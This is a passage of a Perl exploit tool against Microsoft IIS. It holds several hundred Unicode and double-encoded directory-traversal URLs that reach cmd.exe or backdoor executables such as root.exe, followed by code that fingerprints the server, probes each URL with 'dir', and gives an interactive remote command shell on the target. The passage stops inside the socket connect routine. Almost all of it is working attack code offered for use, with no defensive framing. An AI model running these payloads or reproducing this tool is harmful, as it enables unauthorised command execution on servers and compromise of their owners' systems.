$U[159] = "/PBServer/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[160] = "/PBServer/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[161] = "/PBServer/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[162] = "/PBServer/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[163] = "/PBServer/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[164] = "/PBServer/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[165] = "/PBServer/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[166] = "/PBServer/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[167] = "/PBServer/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[168] = "/PBServer/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[169] = "/PBServer/root.exe?/c+";
$U[170] = "/PBServer/cmd.exe?/c+";
$U[171] = "/PBServer/sensepost.exe?/c+";
$U[172] = "/PBServer/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[173] = "/PBServer/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[174] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[175] = "/PBServer/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[176] = "/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[177] = "/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[178] = "/Rpc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[179] = "/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[180] = "/Rpc..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[181] = "/Rpc/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[182] = "/Rpc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[183] = "/Rpc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[184] = "/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[185] = "/Rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[186] = "/Rpc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[187] = "/Rpc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[188] = "/Rpc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[189] = "/Rpc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[190] = "/Rpc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[191] = "/Rpc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[192] = "/Rpc/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[193] = "/Rpc/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[194] = "/Rpc/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[195] = "/Rpc/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[196] = "/Rpc/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[197] = "/Rpc/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[198] = "/Rpc/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[199] = "/Rpc/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[200] = "/Rpc/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[201] = "/Rpc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[202] = "/Rpc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[203] = "/Rpc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[204] = "/Rpc/root.exe?/c+";
$U[205] = "/Rpc/cmd.exe?/c+";
$U[206] = "/Rpc/sensepost.exe?/c+";
$U[207] = "/Rpc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[208] = "/Rpc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[209] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[210] = "/Rpc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[211] = "/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[212] = "/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[213] = "/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[214] = "/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[215] = "/samples..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[216] = "/samples/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[217] = "/samples/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[218] = "/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[219] = "/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[220] = "/samples/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[221] = "/samples/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[222] = "/samples/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[223] = "/samples/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[224] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[225] = "/samples/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[226] = "/samples/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[227] = "/samples/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[228] = "/samples/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[229] = "/samples/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[230] = "/samples/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[231] = "/samples/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[232] = "/samples/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[233] = "/samples/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[234] = "/samples/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[235] = "/samples/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[236] = "/samples/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[237] = "/samples/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[238] = "/samples/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[239] = "/samples/root.exe?/c+";
$U[240] = "/samples/cmd.exe?/c+";
$U[241] = "/samples/sensepost.exe?/c+";
$U[242] = "/samples/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[243] = "/samples/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[244] = "/samples/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[245] = "/samples/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[246] = "/_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[247] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$U[248] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[249] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[250] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[251] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$U[252] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[253] = "/_vti_bin/..%c0%af../..%c0%1f../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[254] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[255] = "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[256] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[257] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[258] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[259] = "/cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[260] = "/cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[261] = "/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[262] = "/cgi-bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[263] = "/cgi-bin..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[264] = "/cgi-bin/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[265] = "/cgi-bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[266] = "/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[267] = "/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[268] = "/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[269] = "/cgi-bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[270] = "/cgi-bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[271] = "/cgi-bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[272] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[273] = "/cgi-bin/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[274] = "/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[275] = "/cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[276] = "/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[277] = "/cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[278] = "/cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[279] = "/cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[280] = "/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[281] = "/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[282] = "/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[283] = "/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[284] = "/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[285] = "/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[286] = "/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[287] = "/cgi-bin/root.exe?/c+";
$U[288] = "/cgi-bin/cmd.exe?/c+";
$U[289] = "/cgi-bin/sensepost.exe?/c+";
$U[290] = "/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[291] = "/cgi-bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[292] = "/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[293] = "/cgi-bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[294] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[295] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[296] = "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[297] = "/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[298] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[299] = "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[300] = "/includes/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[301] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[302] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[303] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[304] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[305] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[306] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[307] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[308] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[309] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[310] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[311] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[312] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[313] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[314] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[315] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$U[316] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[317] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[318] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[319] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[320] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[321] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[322] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[323] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[324] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt./system32/cmd.exe?/c+";
$U[325] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[326] = "/msadc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[327] = "/msadc/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[328] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[329] = "/msadc/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[330] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[331] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[332] = "/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[333] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[334] = "/msadc/..%c1%9c/winnt/system32/cmd.exe?/c+";
$U[335] = "/msadc/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+";
$U[336] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[337] = "/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[338] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[339] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[340] = "/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[341] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[342] = "/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[343] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[344] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[345] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[346] = "/msadc/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+";
$U[347] = "/msadc/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+";
$U[348] = "/msadc/..%u002e..%u002e/winnt/system32/cmd.exe?/c+";
$U[349] = "/msadc/..%u002f..%u002fwinnt/system32/cmd.exe?/c+";
$U[350] = "/msadc/..%u005c..%u005cwinnt/system32/cmd.exe?/c+";
$U[351] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$U[352] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[353] = "/_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[354] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[355] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[356] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?./c+";
$U[357] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[358] = "/_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[359] = "/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[360] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[361] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[362] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[363] = "/_mem_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[364] = "/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[365] = "/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[366] = "/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[367] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[368] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$U[369] = "/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[379] = "/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[371] = "/_mem_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[372] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[373] = "/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+";
$U[374] = "/_mem_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[375] = "/_mem_bin/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[376] = "/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[377] = "/_mem_bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[378] = "/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[379] = "/_mem_bin/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[380] = "/_mem_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[381] = "/_mem_bin/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[382] = "/_mem_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[383] = "/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[384] = "/_mem_bin/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[385] = "/_mem_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[386] = "/_mem_bin/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[387] = "/_mem_bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[388] = "/_mem_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[389] = "/_mem_bin/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[390] = "/_mem_bin/..%c1%9c/winnt/system32/cmd.exe?/c+";
$U[391] = "/_mem_bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+";
$U[392] = "/_mem_bin/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[393] = "/_mem_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[394] = "/_mem_bin/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[395] = "/_mem_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[396] = "/_mem_bin/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[397] = "/_mem_bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[398] = "/_mem_bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[399] = "/_mem_bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[400] = "/_vti_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[401] = "/_vti_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[402] = "/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[403] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[404] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[405] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[406] = "/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[407] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[408] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[409] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[410] = "/_vti_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[411] = "/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[412] = "/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[413] = "/_vti_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[414] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[415] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$U[416] = "/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[417] = "/_vti_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[418] = "/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[419] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[420] = "/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+";
$U[421] = "/_vti_bin/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[422] = "/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[423] = "/_vti_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[424] = "/_vti_bin/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[425] = "/_vti_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[426] = "/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[427] = "/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[428] = "/_vti_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[429] = "/iisadmpwd/cmd.exe?/c+";
$U[430] = "/iisadmpwd/cmd1.exe?/c+";
$U[431] = "/iisadmpwd/root.exe?/c+";
$U[432] = "/iisadmpwd/sensepost.exe?/c+";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nGet IIS string ...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
        $output = $results[$X];
        if (defined $output){
        if ($output =~/IIS/){ $webserver = "iis" };
        };
};
if ($webserver ne "iis"){
print "\a\a\n\nWARNING : UNABLE TO GET IIS STRING.";
print "\nThis Server may not be running Micro\$oft IIS WebServer";
print "\n\n\nContinue anyway? ... [Y/N]";
my $choice = <STDIN>;
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
        };
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nScanning $host on port $port ...";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                              $status = "vulnerable";
                              };
        };
if ($flag eq "0") {
print "\nNo URL $loop...";
}else{
print "\a\a\a\n$host VULNERABLE TO URL $loop !!!";
     };
};
if ($status eq "not_vulnerable"){
                                print "\n\n



















































SORRY $host is NOT Vulnerable to this Exploit.";
                                &exit;
                                };
};
sub choose {
print "\nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
print "\nURL: HTTP://$host$url";
};
sub other {
print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
print "\nHTTP://$host";
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
print "\nCommand :";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
                                Proto => "tcp",
                                PeerAddr => "$host",
                                PeerPort => "$port",
